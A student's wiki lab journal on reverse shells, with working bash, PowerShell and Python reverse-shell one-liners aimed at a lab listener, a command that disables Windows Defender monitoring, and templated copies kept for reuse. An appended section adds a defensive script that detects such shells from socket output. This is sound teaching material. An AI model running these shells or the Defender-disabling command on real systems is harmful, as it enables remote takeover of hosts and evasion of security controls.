Lab 8.2 Reverse Shells - Oliver-Mustoe/Oliver-Mustoe-Tech-Journal GitHub Wiki
In this lab we explored reverse shells and how to set them up/perform them in Bash, Command Prompt, and Python.
Notes
First I logged into sec335-rocky (10.0.17.200), a generic Rocky Linux system meant for SEC-335 practice, with my cyber.local credentials. I then, on my Kali box, set up a `nc` listener on port 4449/tcp with the command:

```bash
nc -nlvp 4449
```

`nc` flags explained:
- `-n` = No DNS or service lookups
- `-l` = Listen for an incoming connection instead of beginning a connection with a remote host
- `-v` = Verbose output
- `-p` = Specify source port to be used
Then on sec335-rocky, I used a native bash reverse shell to connect to the listener (command below):

```bash
/bin/bash -i >& /dev/tcp/10.0.17.103/4449 0>&1
```

With this, I could interact with sec335-rocky from my `nc` session!
I would then test this further by using the Weevely webshell I made in Lab 8.1 - Weevely to execute the same native bash reverse shell on the Pippin target (10.0.5.25). Below is a screenshot showing this process as well as showing I can execute commands on the target:
Then I logged onto my Windows VM and turned off Windows Defender with the following command in PowerShell:

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```

Afterwards, with a `nc` listener (same command as above) on my Kali VM, I could run the following code in Command Prompt on my Windows VM to have a PowerShell reverse shell in Kali (example of this in screenshot):

```cmd
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.103',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
Finally, back on sec335-rocky, I ran the following Python command (with a `nc` listener on Kali) to get a Python reverse shell (modified version of this script found on GitHub by user "ylevalle"):

```bash
python3 -c "import sys, socket, os, pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('10.0.17.103',4449));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash');"
```

Screenshot of the above Python reverse shell process:
Stripped commands
Below are the commands for this lab stripped of IPs/ports for later use:

nc listener

```bash
nc -nlvp {PORT}
```

Bash reverse shell

```bash
/bin/bash -i >& /dev/tcp/{IP_OF_LISTENER}/{PORT} 0>&1
```

Windows PowerShell reverse shell

```cmd
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('{IP_OF_LISTENER}',{PORT}); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

Python reverse shell
(Modified from https://github.com/ylevalle/python36shells/blob/master/reverse_shell.py):

```bash
python3 -c "import sys, socket, os, pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('{IP_OF_LISTENER}',{PORT}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash');"
```
Reflection
- Make sure to know what interface (eth0, wg0) I should be targeting for that lab.
- Reverse shells are a powerful tool in an attacker's toolbox.
- From our Wireshark captures in 8.1 and 8.2, monitoring traffic to see if there is any suspicious activity happening is vital. So with that in mind, I also want to explore and find a more encoded reverse shell (the same way that Weevely is an encoded webshell).
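The reflection above points at the defensive side of this lab: on the target, both the bash `/dev/tcp` shell and the Python `dup2` shell leave a very visible host artifact, a shell interpreter holding an established TCP socket on its own file descriptors 0, 1 and 2. The following script is an added example and is not part of the original journal; it parses `ss -tnp` output (the sample lines, PIDs and addresses below are constructed, using the lab's 10.0.17.x range) and flags interpreter processes that own an established socket, rating a process "high" when that socket is wired to its stdio.

```python
import re
from dataclasses import dataclass, field

# Interpreters that normally should not be holding an established TCP socket
# themselves on a server host. bash, python3 and powershell are the three
# shells used on this page; the rest are common equivalents.
SHELL_INTERPRETERS = {
    "bash", "sh", "dash", "zsh", "python", "python2", "python3", "perl",
    "php", "ruby", "nc", "ncat", "netcat", "powershell", "pwsh", "cmd",
}

# One `ss -tnp` data row: State Recv-Q Send-Q Local:Port Peer:Port users:(...)
SS_LINE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+)"
    r"(?:\s+users:\((?P<users>.*)\))?\s*$"
)
# One ("comm",pid=N,fd=N) entry inside the users:(...) column
PROC = re.compile(r'\("(?P<comm>[^"]+)",pid=(?P<pid>\d+),fd=(?P<fd>\d+)\)')

# Constructed sample: an ssh session, the lab's bash /dev/tcp shell (fds 0-2 on the
# socket), the lab's python3 shell (socket dup2'd onto 0-2, original fd 3), a curl
# download, and a python3 process talking to a database (benign interpreter use).
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
ESTAB 0      0      10.0.17.200:22      10.0.17.50:53210  users:(("sshd",pid=1200,fd=4))
ESTAB 0      0      10.0.17.200:49812   10.0.17.103:4449  users:(("bash",pid=2314,fd=2),("bash",pid=2314,fd=1),("bash",pid=2314,fd=0))
ESTAB 0      0      10.0.17.200:38122   10.0.17.103:4449  users:(("python3",pid=2419,fd=3),("python3",pid=2419,fd=2),("python3",pid=2419,fd=1),("python3",pid=2419,fd=0))
ESTAB 0      0      10.0.17.200:40110   10.0.17.40:443    users:(("curl",pid=2500,fd=5))
ESTAB 0      0      10.0.17.200:41000   10.0.17.60:5432   users:(("python3",pid=2600,fd=6))
"""


@dataclass
class Finding:
    pid: int
    comm: str
    local: str
    peer: str
    fds: list = field(default_factory=list)
    reasons: set = field(default_factory=set)

    @property
    def severity(self) -> str:
        # stdin/stdout/stderr bound to a socket is the signature of a
        # redirect-style reverse shell; an interpreter with any socket is weaker.
        return "high" if "stdio_on_socket" in self.reasons else "medium"


def find_reverse_shell_candidates(ss_output: str) -> list:
    """Return one Finding per interpreter PID that owns an ESTAB TCP socket."""
    by_pid = {}
    for raw in ss_output.splitlines():
        m = SS_LINE.match(raw.strip())
        if not m or m["state"] != "ESTAB" or not m["users"]:
            continue  # header line, non-established socket, or no owner shown
        local = f"{m['laddr']}:{m['lport']}"
        peer = f"{m['raddr']}:{m['rport']}"
        for p in PROC.finditer(m["users"]):
            comm, pid, fd = p["comm"], int(p["pid"]), int(p["fd"])
            if comm not in SHELL_INTERPRETERS:
                continue
            f = by_pid.setdefault(pid, Finding(pid, comm, local, peer))
            f.fds.append(fd)
            f.reasons.add("interpreter_holds_tcp_socket")
            if fd in (0, 1, 2):
                f.reasons.add("stdio_on_socket")
    # High-severity findings first, then by PID for stable output
    return sorted(by_pid.values(), key=lambda f: (f.severity != "high", f.pid))


if __name__ == "__main__":
    for f in find_reverse_shell_candidates(SAMPLE_SS):
        print(f"[{f.severity:6}] pid={f.pid} {f.comm} {f.local} -> {f.peer} "
              f"fds={sorted(f.fds)} reasons={sorted(f.reasons)}")
```

Run it against live output with `ss -tnp | python3 detect.py` after swapping `SAMPLE_SS` for `sys.stdin.read()`. The "medium" hit on the database client shows why the fd check matters: scripting languages legitimately open sockets all the time, but none of them should have their standard streams pointed at one.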